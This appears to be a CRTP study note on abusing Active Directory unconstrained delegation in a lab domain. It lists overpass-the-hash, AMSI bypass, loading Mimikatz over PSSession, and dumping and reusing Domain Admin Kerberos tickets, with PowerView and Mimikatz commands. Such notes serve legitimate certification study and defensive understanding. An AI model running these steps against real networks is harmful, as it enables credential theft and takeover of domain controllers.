CRTP (Unconstrained-Delegation)
CRTP (Unconstrained-Delegation)
CRTP (Unconstrained-Delegation)
Unconstrained Delegation
Methodology/Steps
- For an example we have machine pwn1 as an Unconstrained user; We are pwn0 and we got foot-hold/credentials/hashes for machine pwn2 who has local admin access for machine pwn1; Hence we can perform this attack
- Get a Powershell session as a different user using “Over pass the hash” attack if required(in this case its pwn2/appadmin)
- We can try searching for local admins it has access to using Find-LocalAdminAccess -Verbose
- Create a New-PSSession attaching to the “Unconstrained user”
- Enter the new session using Enter-PSSession
- Bypass the AMSI
- EXIT
- Load Mimikatz.ps1 on the new session using Invoke-command
- Enter the new session using Enter-PSSession again
- Now we can get the admin token and save it to the disk
- Try and check if you have any file from a DA
- If not we can try to pull if there is any sessions logged on as Administrator as pwn0 using Invoke-Hunter then run the attack again
- Once we get an DA token we can Reuse the token using Invoke-Mimikatz
- Now we can access any service on the DC; Example
ls \\dc-corp\C$or use WMI-Commands / ScriptBlock
Enumerate computers with Unconstrained Delegation
1
Get-NetComputer -UnConstrained
Check if a token is available and save to disk
Get admin token After compromising the computer with UD enabled, we can trick or wait for an admin connection
Reuse of the DA token
1
Invoke-Mimikatz -Command '"kerberos::ptt [email protected]"'
Pull any sessions if logged on with administrator/ Printer Bug
1
Invoke-UserHunter -ComputerName dcorp-appsrv -Poll 100 -UserName Administrator -Delay 5 -Verbose
This post is licensed under
CC BY 4.0
by the author.